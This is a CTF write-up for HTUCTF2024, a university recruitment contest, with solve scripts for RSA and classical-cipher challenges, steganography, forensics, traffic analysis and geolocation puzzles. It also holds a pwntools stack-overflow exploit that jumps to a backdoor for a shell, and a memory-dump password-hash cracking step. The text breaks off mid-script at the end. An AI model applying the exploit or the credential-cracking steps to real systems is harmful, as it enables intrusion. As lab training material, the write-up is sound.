HTUCTF2024: Henan Normal University Recruitment Contest

Posted by Kicky_Mu on 2024-05-05

CRYPTO

easyMath

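Challenge

In ancient China many people shared the same name.
Take Sunzi (孫子), for example: one was versed in the art of war, another in mathematics.
Can you help me work out the answer to this problem?
Start the container, then download the corresponding output file.
Difficulty: easy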

from secret import flag
from Crypto.Util.number import *


def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

n1 = getPrime(256)
n2 = getPrime(256)

c1 = m % n1
c2 = m % n2

with open("./result.txt","w") as file:
	file.write(f"{c1=}\n{c2=}\n{n1=}\n{n2=}")
	file.close()


c1=83689382223866455921972283666041548913707590157650641569649861997774896018775
c2=59781417889496026093316789713307179877847969875945980953377618064246216393966
n1=94819471330207996193824867701549517420931391131653697367385442658040198169087
n2=81518723062141584749826931381471762289036698180799665826428079725669435831939

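My solution:

We are given two (n, c) pairs whose moduli are pairwise coprime, so the standard Chinese Remainder Theorem template applies directly.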

import gmpy2
import libnum
c1=83689382223866455921972283666041548913707590157650641569649861997774896018775
c2=59781417889496026093316789713307179877847969875945980953377618064246216393966
n1=94819471330207996193824867701549517420931391131653697367385442658040198169087
n2=81518723062141584749826931381471762289036698180799665826428079725669435831939
e = 1
n = [n1, n2]
c = [c1, c2]
N = 1
for i in n:
    N = N * i
m_e = 0
for i in range(len(n)):
    m_e = m_e + c[i] * N // n[i] * gmpy2.invert(N // n[i], n[i])
m_e = m_e % N
m, f = gmpy2.iroot(m_e, e)
flag = libnum.n2s(int(m))
print(flag)
# HTUCTF{6830dfb6-6dad-47c3-9845-cbf8729a39d0}

babyRSA

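Challenge

Only once you have solved this challenge have you truly stepped into the world of cryptography.
RSA is used very widely; from SSH to web interactions, RSA is everywhere.
It is an asymmetric encryption scheme with two keys: we encrypt with one key, and the other party can only decrypt with the other key.
We call these two keys the public key and the private key.
Have you ever wondered how such a remarkable algorithm actually works?
In this challenge I will give you the public key and the private key. Can you decrypt the encrypted message?
Difficulty: easy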

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

p = getPrime(1024)
q = getPrime(1024)
n = p*q
e=0x10001
phi = (p-1)*(q-1)
d=int(invert(e,phi))

c = pow(m,e,n)

with open("./babyRSA.txt","w") as file:
	file.write(f"PublicKey = {(n,e)}\nPrivateKey = {(n,d)}\nSecretMessage = {c}")
	file.close()
PublicKey = (15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659, 65537)
PrivateKey = (15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659, 10130966979812730784101987023698572165438594877129919513875915803386628078276096541375947471124972080653508946533508705769675989693121420958341293590115967743877780573199816212130999984155050824612355332287183770309757244122492983619964767386402633068863887043854103203055675295220493184082954328413364468756304963614016917597743916465686317910038955387483525262605921266852350229828235038160818884177156053818135328631651154292654654240777442377441948318512112581410714535003804163937871843629160969182930526468352966433926341943406916675978477553950863356810621030844225209745966135746365112354585567779963748595969)
SecretMessage = 8909815489319611747101806090352005136825996914855161761302645282643080552432976736620209215329466289301992429134065407495314041984721445376467363401021503220512909366842774353910947660541614402215323602839266991486292484969950842395065745792919439549479729664538304190570526236917426962327919265077666475322894816082657333664773384861021347407612617932770946226057878531069668485974874093332911603383506567742453209014787426744169318763457638545787910612700001393603668998957766517443362067847142093494532359202010509321223568196703549094729917579540223646141085303490009162322771331375674034776269587055027505487338

My solution:

We are given n, e, d and c, so just decrypt directly.

from Crypto.Util.number import *
n=15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659
e=65537
c=8909815489319611747101806090352005136825996914855161761302645282643080552432976736620209215329466289301992429134065407495314041984721445376467363401021503220512909366842774353910947660541614402215323602839266991486292484969950842395065745792919439549479729664538304190570526236917426962327919265077666475322894816082657333664773384861021347407612617932770946226057878531069668485974874093332911603383506567742453209014787426744169318763457638545787910612700001393603668998957766517443362067847142093494532359202010509321223568196703549094729917579540223646141085303490009162322771331375674034776269587055027505487338
d=10130966979812730784101987023698572165438594877129919513875915803386628078276096541375947471124972080653508946533508705769675989693121420958341293590115967743877780573199816212130999984155050824612355332287183770309757244122492983619964767386402633068863887043854103203055675295220493184082954328413364468756304963614016917597743916465686317910038955387483525262605921266852350229828235038160818884177156053818135328631651154292654654240777442377441948318512112581410714535003804163937871843629160969182930526468352966433926341943406916675978477553950863356810621030844225209745966135746365112354585567779963748595969

print(long_to_bytes(pow(c,d,n)))
# HTUCTF{ebc4a957-ab76-481c-b6bd-667cc4ac3753}

RSA

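Challenge

Well done! By now you have surely picked up some RSA knowledge, and you may think RSA is perfect.
Indeed, under ideal conditions 2048-bit RSA can even be used to secure banks.
But everything has exceptions, and in some situations RSA becomes less secure.
This challenge simulates one such insecure RSA, which lets you compute the private key from the public key.
In this challenge you need to use what you learned in high school, together with knowledge about primes, to find the flaw
and compute the private key to unlock the key data!
Difficulty: medium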

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

def gen():
	p = getPrime(1024)
	q = int(next_prime(p))
	n = p*q
	phi = (p-1)*(q-1)
	e=0x10001
	while(gcd(phi,e) != 1):
		p = getPrime(1024)
		q = next_prime(p)
		n = p*q
		phi = (p-1)*(q-1)
	return (n,e,phi)


n,e,phi = gen()
c = pow(m,e,n)

with open("./RSA.txt","w") as file:
	file.write(f"{n=}\n{c=}")
	file.close()

n=21286146193854256777821383042439507781105332290319538512628531084363651251523737327523526945612481957021838676502097885784407117228821536316627194056016486984426091341625957366569549571084440241355428867857837140319691847950217286102843758914496900637376261209537885852057822619662489521115321859242996996458728300402824811649138687472097270381948645979317238405355317018553106347027764063263805658928486133580606644257911929016951909686457495514815344574782826352986788656399212873924655579987522938396847374837850343107582172369858866834252004753149808298622166784424349528065903222286329891172505299710375017996191
c=7921489143329983775649495695329191444017407997719201400647964433213317629336909589895994155506980858710603819714367102048723400232379433082760979014532262440915742640192044614047545849862082848156805064088229776304993545321080324512923192149436096920526568355327960180036643391499502690341050835062928627571479179709775940839058598193047520944765623044970104274162972438155291820907007955749419361799197271532772738133005238318979095274472556402534604449320547273946695463016399927750930765171319755043575142378579721541211811566320576805327333527544884573840360315620734184329550640235605842721184595864846192049833

My solution:

The two primes are adjacent, so the standard template works.

import gmpy2
from Crypto.Util.number import *
e = 65537
n=21286146193854256777821383042439507781105332290319538512628531084363651251523737327523526945612481957021838676502097885784407117228821536316627194056016486984426091341625957366569549571084440241355428867857837140319691847950217286102843758914496900637376261209537885852057822619662489521115321859242996996458728300402824811649138687472097270381948645979317238405355317018553106347027764063263805658928486133580606644257911929016951909686457495514815344574782826352986788656399212873924655579987522938396847374837850343107582172369858866834252004753149808298622166784424349528065903222286329891172505299710375017996191
c=7921489143329983775649495695329191444017407997719201400647964433213317629336909589895994155506980858710603819714367102048723400232379433082760979014532262440915742640192044614047545849862082848156805064088229776304993545321080324512923192149436096920526568355327960180036643391499502690341050835062928627571479179709775940839058598193047520944765623044970104274162972438155291820907007955749419361799197271532772738133005238318979095274472556402534604449320547273946695463016399927750930765171319755043575142378579721541211811566320576805327333527544884573840360315620734184329550640235605842721184595864846192049833

# q = next_prime(p), so q is the first prime above isqrt(n)
sn = gmpy2.isqrt(n)
q = gmpy2.next_prime(sn)
p = n // q
phi = (p-1)*(q-1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))
# HTUCTF{0bc91ba1-7847-424f-a5ae-7514c2dae479}

Crypto sign-in (密碼_簽到)

Challenge

Do you know the Caesar cipher?

FRSARD{UCJAMKC_RM_2024_FRSARD!!!}

My solution:

Solved in one pass with the 隨波逐流 tool:

HTUCTF{WELCOME_TO_2024_HTUCTF!!!}

high_RSA

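Challenge

Congratulations, you now understand the dangers RSA faces in certain situations.
But just as a hemp rope always snaps at its thinnest point, no aspect of security can be neglected.
Suppose you are a "red hacker" holding a backdoor program on the other party's computer, but to avoid detection this program cannot request enough memory.
To obtain their data, you use this program to get the RSA data from their computer, so that you can connect to it over SSH.
The data is so large that you can only obtain part of it.
Can you recover the complete data and break in successfully?
Difficulty: hard
(It's actually not that hard... don't be scared off by abstract algebra. "I can't do math" ≠ "I can't solve the challenge"; inequalities make short work of it.)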

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

def gen():
	p = getStrongPrime(1024)
	q = getStrongPrime(1024)
	n = p*q
	phi = (p-1)*(q-1)
	e=0x10001
	while(gcd(phi,e) != 1):
		p = getStrongPrime(1024)
		q = getStrongPrime(1024)
		n = p*q
		phi = (p-1)*(q-1)
	return (n,e,phi,p,q)


n,e,phi,p,q = gen()
c = pow(m,e,n)
high_p = (p >> 256) << 256

with open("./highRSA.txt","w") as file:
	file.write(f"{n=}\n{c=}\n{high_p=}")
	file.close()
n=26832066962458662767711134650569516764878390244093044249431717541352809829010026292756085075249493683546901865571162092807642447066717935954820980203362970326424457510243979090947839410021515024546564848003707416178430454370843256632438176839918149251551762655339805650499916986912193271524738666644992154557709230313336222352760741284949409799415476076495429070382400856900167330412449787134931316411702443532096911949687029419857447352146932683073974227601854627297878898195567899861786632327700242864905513181808927779278798543351526860932005535628493103381412084360219740343872835463714854550964908803100739720711
c=5263373082734577567839479586655414623605123502659516848748731798811781440341949806983283726466045084344593071073334658221121562912558383981187865516410285252387584393467585522751249550213224687813899297082806077871733395201872158325739707521228687723161973373291027234390564962358683344756569018948507404252733763898300987607979776946680568688214863909198222484739353033110947869228017720295399019491952331445167542451969127203340175478249933145970770930874714514592875202353852229150430254860073007705757537682021345088127046213891504810736043999063285587400229349628962118127506856508919505894615638568778221088766
high_p=155260268569003012839830552245401347442679649702540687666718397914567736179525136763425429591738078795659488517073327110371579992023376288690407974823049327122522731236534457700781670557633182106779419333443659720534567359356182612444617411150434138985917242359563702694312595606207476750599129603389758898176

My solution:

A classic leak of the high bits of p.

import gmpy2
from Crypto.Util.number import *
e=65537
n=26832066962458662767711134650569516764878390244093044249431717541352809829010026292756085075249493683546901865571162092807642447066717935954820980203362970326424457510243979090947839410021515024546564848003707416178430454370843256632438176839918149251551762655339805650499916986912193271524738666644992154557709230313336222352760741284949409799415476076495429070382400856900167330412449787134931316411702443532096911949687029419857447352146932683073974227601854627297878898195567899861786632327700242864905513181808927779278798543351526860932005535628493103381412084360219740343872835463714854550964908803100739720711
c=5263373082734577567839479586655414623605123502659516848748731798811781440341949806983283726466045084344593071073334658221121562912558383981187865516410285252387584393467585522751249550213224687813899297082806077871733395201872158325739707521228687723161973373291027234390564962358683344756569018948507404252733763898300987607979776946680568688214863909198222484739353033110947869228017720295399019491952331445167542451969127203340175478249933145970770930874714514592875202353852229150430254860073007705757537682021345088127046213891504810736043999063285587400229349628962118127506856508919505894615638568778221088766
high_p=155260268569003012839830552245401347442679649702540687666718397914567736179525136763425429591738078795659488517073327110371579992023376288690407974823049327122522731236534457700781670557633182106779419333443659720534567359356182612444617411150434138985917242359563702694312595606207476750599129603389758898176
# SageMath: the unknown low 256 bits of p are a small root of high_p + x modulo a factor of n
R.<x> = PolynomialRing(Zmod(n))
f = high_p + x
x = f.small_roots(X = 2^256,beta = 0.4)
if x:
    p = high_p + int(x[0])
    q = n // p
    d = gmpy2.invert(e,(p-1)*(q-1))
    m = pow(c,d,n)
    print(long_to_bytes(int(m)))
# HTUCTF{bbb7e2c4-5739-4eab-ad45-570c86be20e7}

Attack

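Challenge

For a cryptosystem, if we can find a way to recover the key from known partial content and the corresponding encrypted content,
then this method is called a plaintext attack.
In this challenge you are given a value encrypted with a cryptosystem similar to the Caesar cipher.
Can you attack it and find the flag?
Difficulty: easy

The flag header for this challenge is htuctf{}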

secret is :oxfnhm{51fn0n78-78r2-49k2-e6o6-45386qth8i2q}

My solution:

Vigenère decoding; the key is hello (computed from the flag header).
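
The key derivation described above, worked through as an added example (not part of the original write-up): subtract the known header htuctf from the first six ciphertext letters, reduce the key stream to its shortest period, and decrypt. It assumes that digits and punctuation pass through without consuming key letters, and it checks the result against the hex UUID shape of the other flags on this page.

```python
import string

ALPHABET = string.ascii_lowercase
HEADER = "htuctf{"

# Values copied from the challenge text above.
SECRET = "oxfnhm{51fn0n78-78r2-49k2-e6o6-45386qth8i2q}"
KNOWN = "htuctf"


def keystream_from_known_prefix(ciphertext, known_plaintext):
    """Subtract known plaintext letters from ciphertext letters to expose the key stream."""
    stream = []
    for c, p in zip(ciphertext, known_plaintext):
        if c not in ALPHABET or p not in ALPHABET:
            raise ValueError("the known prefix must consist of lowercase letters")
        stream.append(ALPHABET[(ALPHABET.index(c) - ALPHABET.index(p)) % 26])
    return "".join(stream)


def shortest_period(stream):
    """Return the shortest key that, when repeated, reproduces the observed key stream."""
    for length in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % length] for i in range(len(stream))):
            return stream[:length]
    return stream


def vigenere_decrypt(ciphertext, key):
    """Decrypt lowercase letters; other characters are copied and do not advance the key
    (an assumption about the challenge's cipher)."""
    out = []
    k = 0
    for ch in ciphertext:
        if ch in ALPHABET:
            shift = ALPHABET.index(key[k % len(key)])
            out.append(ALPHABET[(ALPHABET.index(ch) - shift) % 26])
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def looks_like_uuid_flag(candidate):
    """Sanity check: the body between the braces should contain only hex digits and dashes."""
    if not (candidate.startswith(HEADER) and candidate.endswith("}")):
        return False
    body = candidate[len(HEADER):-1]
    return all(ch in "0123456789abcdef-" for ch in body)


def recover():
    stream = keystream_from_known_prefix(SECRET[:len(KNOWN)], KNOWN)
    key = shortest_period(stream)
    return stream, key, vigenere_decrypt(SECRET, key)


if __name__ == "__main__":
    stream, key, plaintext = recover()
    print("key stream:", stream)
    print("key:", key)
    print("plaintext:", plaintext, "| plausible:", looks_like_uuid_flag(plaintext))
```

Six known letters only confirm the period with a single repeated key letter, so the hex-only check on the decrypted body is what validates the guess.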


Strange RSA (奇怪的RSA)

Challenge

Why does this n look different from what we learned before?
Difficulty: lower-medium

n=9797280722297383274206129366924911238159531646782588235425496441018603521906214822246463461173026436766357301667490255758014545136376215630632913217943693454599607181104457459704890073820815269629927086893622983109900322077682061770037009627858293858079170648986304796239176995439230791482842207808760812707274441718245663482728958202732073615184138431872947691082675226097330289348107538915563758447312783574426116626142170193857288512932028427662766889672667666124977746543158461842707085268112769440167135292097914024183004899521423565999413912896081894668524836680741305072184620592976414632021146993068852321682224774063402386979275754410550658725965565558741379647004611814084223568478000636303177114721095055926493733229126101656421088488149818472808276183648127582974030582322605326949335921761883338261371947420333298835965419945468897218378857695789805996307849895056019137558524547291427992927750239912783691973289027652868009039409101567361743084903654992780865430272335247215413205988182536939011777593246190904789384746466169417549523741915876204210448126866806898004736948795818397941220900188611543001463316268786023800879826714282193478815064580026612881606703097040735229393269388992971022987866655043694603025183226901723140756053762333659842691711475526354396212072576764822816149219166129647066887324015483710351976091899190818277553825384103028795714466631003515086950798032880614154340697278735600240355126104124454472587233763326168718337010496877414696789855658240440976001073107676481646007868257165514512406462907
c=5026294270472341516281967768024823988211520479705550347791737269197144991018432260772869917413931970596323376462942676330952706594203686062230870565305755713397064980008245765280923086185322432350745365676393859410733791638737980029398313605454331200823466184561513332154358260911960012186030476084183825686415220565409492864776416837513373738512522098564292785408992952241100323270440158180673533227197308932835014106694454970006386898536636626965401897549172858412952232900506615210718784844859331905728127508619293848356738221599940095985149564780003406814853991525248042768596039920545745290215481665663646075842598915149383754511745185069733195598186369553443089170842916619037179927876137170091853123369124452414031777068336531175674802393050859481751905561595637672065609328749148665586779113822274605772746671318603508401332234892783270849494429661389179557105978067614723323979133624001944328078576201959628636669711294925830023172880802286460253693491031523534646275507929337557144216000320046044856456105803221553459208055536477727124999642450266747885923500686074656279403605048320346579292324096695911518310045059703013950287439053123110957256092192591738831212887488314280535596199050937975272001815140057838227666534017906857787101647310250002243565024224470944832652926327140423057025650796529363452647655178633472248390631519187741674904685731259241960485176749338780224419187384859336116383909982282465893681707228873285368252148860007084379792234483840610940427165345252500655046498669531835852991292614317980670782795421
e=65537

My solution:

Factoring n shows that it is the fifth power of p; in this case phi = p**5 - p**4.

exp:

import gmpy2
from Crypto.Util.number import *

n=9797280722297383274206129366924911238159531646782588235425496441018603521906214822246463461173026436766357301667490255758014545136376215630632913217943693454599607181104457459704890073820815269629927086893622983109900322077682061770037009627858293858079170648986304796239176995439230791482842207808760812707274441718245663482728958202732073615184138431872947691082675226097330289348107538915563758447312783574426116626142170193857288512932028427662766889672667666124977746543158461842707085268112769440167135292097914024183004899521423565999413912896081894668524836680741305072184620592976414632021146993068852321682224774063402386979275754410550658725965565558741379647004611814084223568478000636303177114721095055926493733229126101656421088488149818472808276183648127582974030582322605326949335921761883338261371947420333298835965419945468897218378857695789805996307849895056019137558524547291427992927750239912783691973289027652868009039409101567361743084903654992780865430272335247215413205988182536939011777593246190904789384746466169417549523741915876204210448126866806898004736948795818397941220900188611543001463316268786023800879826714282193478815064580026612881606703097040735229393269388992971022987866655043694603025183226901723140756053762333659842691711475526354396212072576764822816149219166129647066887324015483710351976091899190818277553825384103028795714466631003515086950798032880614154340697278735600240355126104124454472587233763326168718337010496877414696789855658240440976001073107676481646007868257165514512406462907
c=5026294270472341516281967768024823988211520479705550347791737269197144991018432260772869917413931970596323376462942676330952706594203686062230870565305755713397064980008245765280923086185322432350745365676393859410733791638737980029398313605454331200823466184561513332154358260911960012186030476084183825686415220565409492864776416837513373738512522098564292785408992952241100323270440158180673533227197308932835014106694454970006386898536636626965401897549172858412952232900506615210718784844859331905728127508619293848356738221599940095985149564780003406814853991525248042768596039920545745290215481665663646075842598915149383754511745185069733195598186369553443089170842916619037179927876137170091853123369124452414031777068336531175674802393050859481751905561595637672065609328749148665586779113822274605772746671318603508401332234892783270849494429661389179557105978067614723323979133624001944328078576201959628636669711294925830023172880802286460253693491031523534646275507929337557144216000320046044856456105803221553459208055536477727124999642450266747885923500686074656279403605048320346579292324096695911518310045059703013950287439053123110957256092192591738831212887488314280535596199050937975272001815140057838227666534017906857787101647310250002243565024224470944832652926327140423057025650796529363452647655178633472248390631519187741674904685731259241960485176749338780224419187384859336116383909982282465893681707228873285368252148860007084379792234483840610940427165345252500655046498669531835852991292614317980670782795421
e=65537
p = gmpy2.iroot(n,5)[0]
d = gmpy2.invert(e, p**5-p**4)
m = pow(c, d, n)
print(long_to_bytes(m))
# HTUCTF{7b2ca463-d2d9-47ac-930b-6914c3d00c8a}

baby_equation

Challenge

Description: a simple system of equations
Difficulty: medium

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

filename = "baby_equation.txt"

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

e = 65537
p = getPrime(256)
q = getPrime(158)
r = getPrime(126)
n = p*q*r
hint1 = p**2-q**3+r**5
hint2 = p-q**2-r**3
c = pow(m,e,n)
print(f'n = {n}')
print(f'c = {c}')
print(f'hint1 = {hint1}')
print(f'hint2 = {hint2}')

with open(f"./{filename}","w") as file:
	file.write(f"{n=}\n{c=}\n{hint1=}\n{hint2=}")
	file.close()

My solution:

A system of equations: three unknowns, three equations.

Solve it directly.

import gmpy2
import sympy as sp
from Crypto.Util.number import long_to_bytes

# Define the symbolic variables p, q, r
p, q, r = sp.symbols('p q r')

# Define the system of equations
n=1714808108641798425751310477167823335955229712489728804761312762037242675123506918099136836072952998053478120207249337855548456594600603091879518033495336649464097
c=1271059887748896825060264613725111099333346917676850000927141530723445751426003464525479424933165773851501797216393819428216922457947718026431628278372802650997905
hint1=873322371665117750002905530165951105343454768307957282438202226511477054275833928519265678069449383868985966127316349093439543595940439424293980757113264748232611064850437734072475831795015
hint2=-231581973880579877071715841045171446682851086334176281592273453765336628759594866687658829710062474739604131003041
eq1 = p**2-q**3+r**5-hint1
eq2 = p-q**2-r**3-hint2
eq3 = p*q*r-n
# Solve the system of equations
sol = sp.solve((eq1, eq2, eq3), (p, q, r))
print(sol)
# p = 92915895594985626121143662996242137124019722863293916576352995643967780302439
# q = 300531911762485106017266076248013109964445189793
# r = 61409408903806830899572429924195985111

# Solve the challenge
n=1714808108641798425751310477167823335955229712489728804761312762037242675123506918099136836072952998053478120207249337855548456594600603091879518033495336649464097
c=1271059887748896825060264613725111099333346917676850000927141530723445751426003464525479424933165773851501797216393819428216922457947718026431628278372802650997905
e = 65537
p = 92915895594985626121143662996242137124019722863293916576352995643967780302439
q = 300531911762485106017266076248013109964445189793
r = 61409408903806830899572429924195985111
d = gmpy2.invert(e, (p - 1) * (q - 1) * (r - 1))
m = pow(c, d, n)
print(long_to_bytes(m))
# HTUCTF{a29fa9c1-ac6b-4381-b173-002549e01c06}

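guoql's Big Adventure (guoql的大冒險)

Challenge

guoql likes little rabbits. One day the rabbit he keeps at home was trapped by a villain behind a 3-layer fence. Clever as you are, can you help guoql out of this trouble and set the bunny free?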

UdX6OtWqCp0KRHsA
z2sGk1DifJ3aqdNZzk4j7Sk73dTpwTI1BkfFV/KaLWB5bTcODXvH

My solution:

Decode the rail fence cipher first, then decode the Rabbit stream cipher.


MISC

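Easter Egg (彩蛋)

Challenge

There are some menus on this contest platform. Can you find them and recover the flag?

There is no need to brute-force or scan the website!

My solution:

Looking around the platform reveals the following information:

I think you need to know: 4854554354467b77656c63306d655f325f485455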

141,156,144,137,150,141,166,145,137,146,165,156,175

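There is also an image (try it and you will see that it is actually useless).

Part 1, hexadecimal to characters: HTUCTF{welc0me_2_HTU

Part 2, octal to characters: and_have_fun}

Concatenated: HTUCTF{welc0me_2_HTUand_have_fun}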

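Junior High Math, Computer Edition (初中數學(計算機版))

Challenge

Smudged digits
Just as Xiao Ming liked to spill ink on paper when he was little, he still has not kicked the habit after studying computing.
This time he has once again "accidentally" smudged some of the digits in a strange way (shown as ? in the challenge).
Fortunately the teacher saved the md5 value.
Can you help him recover the data?
Difficulty: easy

This is his smudged flag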
HTUCTF{372?7539-0217-1?ef-a234-f8?9d27fc?22}

md5=b9636e79bccbe1cbcdb2f9a7f698742d

My solution:

A typical MD5 brute force.

import string
import hashlib

# Candidate characters for each of the four smudged positions
dic1 = string.digits + string.ascii_lowercase + string.ascii_uppercase
target = 'b9636e79bccbe1cbcdb2f9a7f698742d'
for i1 in dic1:
    for i2 in dic1:
        for i3 in dic1:
            for i4 in dic1:
                t = 'HTUCTF{372'+i1+'7539-0217-1'+i2+'ef-a234-f8'+i3+'9d27fc'+i4+'22}'
                md5 = hashlib.md5(t.encode('utf-8')).hexdigest()
                # Compare against the full 32-character digest
                if md5 == target:
                    print(t)
# HTUCTF{37277539-0217-11ef-a234-f889d27fcc22}

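ez Forensics (ez取證)

Challenge

Little m stored a confidential file on his computer. Can you find this file?
https://www.123pan.com/s/VXmfjv-bPv4H.html
Extraction code: A5T4
Difficulty: medium

My solution:

Scanning the image file with R-Studio reveals an archive: flag.txt.zip

Just recover it. Extracting it turns out to require a password.

Run hashdump with volatility and crack the hash.

After getting the hash 15f952a687d575198c3c5dbd9a1aa89c, looking it up on somd5 gives the password: Windows.7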

htuCTF{Th1s_1s_e2sy_f0rens1cs!!!}

a1eiqinuo

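Challenge

Time to test how deep your Genshin fandom runs!
ps: wrap the flag you get in htuCTF{} before submitting

My solution:

Extracting the archive gives an image.

The end of the file, viewed in 010 Editor, contains c3RlZ2hpZGVfcGFzcz1odHVDVEY=

base64 decoded: steghide_pass=htuCTF

So this is steghide steganography, but trying it on the original image gets nowhere. It turns out the archive hidden inside contains yet another image...

Separating it in Kali yields an archive; an eight-digit numeric brute force gives the password 20240424

This one should be the real steghide steganography, and it yields wenzi.jpg

Recognizable at a glance as the Genshin Impact font; just look the characters up in the table below.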

htuCTF{yuanshenqidong}

music

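Challenge

There is a secret hidden in this pleasant music.
Change the flag you get to HTUCTF{}
Difficulty: easy

Try looking at the file properties; there may be a hint in them

My solution:

The properties mention MP3Stego, and there is also a publisher: 111

Command: decode -X -P 111 music.mp3

This directly gives: flag{valorant_is_a_good_game}

Just change the flag header when submitting.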

baseHome-misc sign-in (baseHome-misc簽到)

Challenge

How many encodings of the base family do you know?
Difficulty: sign-in

SkJLRktRMlVJWjVXRVlMVE1VM0RJWDNCTlpTRjZZVEJPTlNUR01TN05GWlY2NVRGT0o0VjYyREJPQllIUzdJPQ==

My solution:

echo

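Challenge

Feels not as good as Hatsune Miku

My solution:

echo.mid is an audio file; just open it in an online tool: https://app.ampedstudio.com/

Register an account and you can use it.

Then import the MIDI file. The bottom track gives a hint: looking closely, it resembles high and low signal levels, with high as 1 and low as 0, so convert it to 0s and 1s.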

0110100001110100011101010110001101110100011001100111101101100111011101010110110100110001010111110011000101110011010111110011011001101111001101000010000101111101

Decoding gives: htuctf{gum1_1s_6o4!}

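Simple Traffic Analysis (簡單流量分析)

Challenge

Xiao Ming uploaded an image; this is the change in the traffic he generated.
Difficulty: easy

My solution:

Following the challenge description, analyzing the HTTP streams in Wireshark reveals two images, a jpg and a gif (search directly for GIF89a).

There is also a hacker.png, but it is of no use. The jpg and the gif are where to start.

Export all the HTTP objects. Find the largest php file, then open it in CyberChef.

Delete the jpg data that precedes GIF89a, then save the file as a gif. Split it into individual frames.

Some frames contain &#xx;-style encoding. Extracted in full: &#102;&#108;&#97;&#103;&#123;&#83;&#48;&#50;&#50;&#121;&#52;&#111;&#114;&#114;&#53;&#125;

HTML-decoded: flag{S022y4orr5}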

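Camera Position Lookup (機位查詢)

Challenge

Little l and little s went to many places last year and took many photos. Can you find out where these pictures were taken?
ps: all three photos were taken at landmark locations that can be found on a map. The flag is the capitalized first letter of each character of the shooting locations of photos 1, 2 and 3, with the three locations separated by _
For example: if the locations found are "洛邑古城", "二七廣場" and "數字大廈", the flag is htuCTF{LYGC_EQGC_SZDS}
Difficulty: easy

My solution:

Three pictures:

First location:

Search Baidu Maps for the Longmen Grottoes (龍門石窟). Locate the opposite bank of the river, then note that the picture shows stairs and Buddha statues. Judging by the bearing, it is slightly to the left. It turns out to be 禮佛臺; looking up the description of this place on Baidu gives its full name: 禮佛觀景臺 (Lifo Guanjingtai). It is also a good spot for taking photos.

Second location:

Baidu image search shows it is Mount Tai (泰山). A local friend who knows Mount Tai well told me it is 十八盤 (Shibapan, very famous). I then checked the location against Baidu's results for 十八盤. Confirmed!

Third location:

Behind it is the landmark Zhengzhou "corn building" (玉米樓); a Google search and working out the bearing is enough. I also asked a friend in Zhengzhou to confirm (someone familiar with the neighbourhood, the area around Dennis), who recognized it right away as 菸草大廈 (Yancao Dasha).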

htuCTF{LFGJT_SBP_YCDS}

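Hello (你好)

Challenge

He says he originally wanted to give you a hint, but alas his English is poor,
so kind-hearted guoql helped translate it into Chinese! (hands-on-hips.jpg)
Can you figure out what he is hinting at and get the flag?
Difficulty: easy

My solution:

Fixing the PNG width and height in one go reveals the password: maoxian

Separating the image in Kali yields an archive; just extract it.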

HTUCTF{you_can_encrypt_anything_in_anywhere}

PWN

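ez_nc sign-in (ez_nc_簽到)

Challenge

I hear the nc command is amazing?
Difficulty: sign-in

My solution:

Connect to the target with nc and follow the steps. A sign-in challenge with no difficulty.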

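Environment? Environment! (環境?環境!)

Challenge

Every beginning is hard, so why don't we set up a Pwn environment first!
Difficulty: easy

My solution:

Just follow what the txt says; the prerequisite is having your own environment set up, then run the script to get the flag.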

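Cloze Test (完形填空)

Challenge

What? Pwn can be a cloze test too? I don't even have to write the script myself! But how do I write this stack overflow? What is the overflow value, ahhh!!!
Difficulty: medium

My solution:

The rbp offset is 20 in hexadecimal, i.e. 32, which is the preceding buf[32].

After a quick run, ls had no effect. The program is 64-bit, so 8 bytes were missing; adding them back gives padding=32+8=40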

from pwn import *

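context(log_level='debug',arch='amd64',os='linux')
ip = ''    # enter the IP given by the challenge
port = 0   # enter the port given by the challenge
p = remote(ip,port)
backdoor=0x401225
padding=40   # buf[32] plus the 8 bytes added for the 64-bit binary
payload=padding*b'a'+p64(0x401016)+p64(backdoor)
p.sendafter(b"please input:",payload)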
p.interactive()

Once it runs successfully, ls shows the flag; then cat flag.

RE

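Guess the Number sign-in (猜數字_簽到)

Challenge

Tired of hard challenges? Then add a bit of luck and guess a number between 0 and 127; guess right and I will tell you the flag! You can try binary search, but I only give you 5 chances per round, so what is your probability of guessing correctly on the last try? Luck or skill, the choice is yours.
Difficulty: random (depends on how you want to do it)
Topics: reversing or luck

My solution:

The easiest reversing challenge, bar none.

A few tries with binary search and it falls.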

ez_xor

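Challenge

XOR is a computer operation; specifically, XOR is the mathematical operation that gives 0 when the bits are the same and 1 when they differ.
We write XOR as ^; in English it is called xor.
I will give you a program; use the IDA reversing tool uploaded in the group to try to reverse it
and find the flag.
Difficulty: easy

My solution: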

exp:

def reverse_engineer_flag():
    # Initialize the relevant data
    s = "tryw1th"
